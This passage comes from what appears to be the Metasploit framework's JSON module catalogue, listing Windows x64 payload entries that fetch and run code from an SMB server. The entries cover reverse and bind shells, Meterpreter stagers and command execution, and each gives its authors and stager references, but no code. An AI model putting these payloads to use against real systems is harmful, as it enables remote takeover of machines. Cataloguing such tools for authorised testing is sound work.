||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/bind_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/bind_named_pipe",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/bind_named_pipe"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/bind_tcp": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/bind_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/bind_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/bind_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/bind_tcp_rc4": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"hdm <x@hdm.io>",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/bind_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/bind_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/bind_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/bind_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/bind_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/bind_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/bind_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/bind_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/reverse_http": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/reverse_http",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/reverse_http",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/reverse_http",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/reverse_http"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/reverse_https": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/reverse_https",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"hdm <x@hdm.io>",
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/reverse_https",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/reverse_https",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/reverse_https"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/reverse_named_pipe": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/reverse_named_pipe",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/reverse_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/reverse_named_pipe",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/reverse_named_pipe"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/reverse_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/reverse_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/reverse_tcp_rc4": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"hdm <x@hdm.io>",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/reverse_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/reverse_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/reverse_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/reverse_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/reverse_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/reverse_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/reverse_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/reverse_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/reverse_winhttp": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/reverse_winhttp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/reverse_winhttp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/reverse_winhttp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/reverse_winhttp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/custom/reverse_winhttps": {
|
||||
"name": "SMB Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/custom/reverse_winhttps",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/custom/reverse_winhttps",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/custom/reverse_winhttps",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/custom",
|
||||
"stager_refname": "windows/x64/reverse_winhttps"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/encrypted_shell/reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows Command Shell, Encrypted Reverse TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/encrypted_shell/reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"Matt Graeber",
|
||||
"Shelby Pace"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/encrypted_shell/reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/encrypted_shell/reverse_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/encrypted_shell",
|
||||
"stager_refname": "windows/x64/encrypted_reverse_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/encrypted_shell_reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows Encrypted Reverse Shell",
|
||||
"fullname": "payload/cmd/windows/smb/x64/encrypted_shell_reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"Matt Graeber",
|
||||
"Shelby Pace"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn an encrypted command shell",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/encrypted_shell_reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/encrypted_shell_reverse_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/exec": {
|
||||
"name": "SMB Fetch, Windows x64 Execute Command",
|
||||
"fullname": "payload/cmd/windows/smb/x64/exec",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nExecute an arbitrary command (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/exec",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/exec",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/loadlibrary": {
|
||||
"name": "SMB Fetch, Windows x64 LoadLibrary Path",
|
||||
"fullname": "payload/cmd/windows/smb/x64/loadlibrary",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"scriptjunkie",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nLoad an arbitrary x64 library path",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/loadlibrary",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/loadlibrary",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/messagebox": {
|
||||
"name": "SMB Fetch, Windows MessageBox x64",
|
||||
"fullname": "payload/cmd/windows/smb/x64/messagebox",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"pasta <jaguinaga@infobytesec.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a dialog via MessageBox using a customizable title, text & icon",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/messagebox",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/messagebox",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/meterpreter",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp_uuid"
|
||||
},
|
||||
